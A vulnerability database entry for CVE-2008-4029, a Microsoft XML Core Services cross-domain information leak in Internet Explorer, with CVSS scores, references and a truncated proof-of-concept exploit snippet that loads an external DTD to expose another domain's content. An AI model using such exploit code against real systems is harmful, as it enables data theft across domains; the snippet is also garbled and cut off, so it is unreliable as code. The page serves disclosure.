Published: 12/11/2008 Updated: 07/12/2023

CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6

VMScore: 435

Vector: AV:N/AC:M/Au:N/C:P/I:N/A:N

Cross-domain vulnerability in Microsoft XML Core Services 3.0 and 4.0, as used in Internet Explorer, allows remote malicious users to obtain sensitive information from another domain via a crafted XML document, related to improper error checks for external DTDs, aka "MSXML DTD Cross-Domain Scripting Vulnerability."

Vulnerable Product	Search on Vulmon	Subscribe to Product
microsoft internet_explorer

<html> <body> KB955218 - CVE-2008-4029 - JA <script type="text/javascript"> var dom = new ActiveXObject("Msxml2DOMDocument30"); domasync = false; var url = "wwwmilw0rmcom/forfundtd"; var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>"; if (domloadXML(xml) == 0) { alert("Blue or Red Pill? " + domparseErrorsrcTex ...

Microsoft XML Core Services DTD cross-domain scripting proof of concept exploit that makes use of the vulnerability noted in MS08-069 ...

CWE-200 http://www.securityfocus.com/bid/32155 http://securitytracker.com/id?1021164 http://www.us-cert.gov/cas/techalerts/TA08-316A.html http://www.vupen.com/english/advisories/2008/3111 http://marc.info/?l=bugtraq&m=122703006921213&w=2 https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5999 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-069 https://nvd.nist.gov https://www.exploit-db.com/exploits/7196/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2008-4029

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect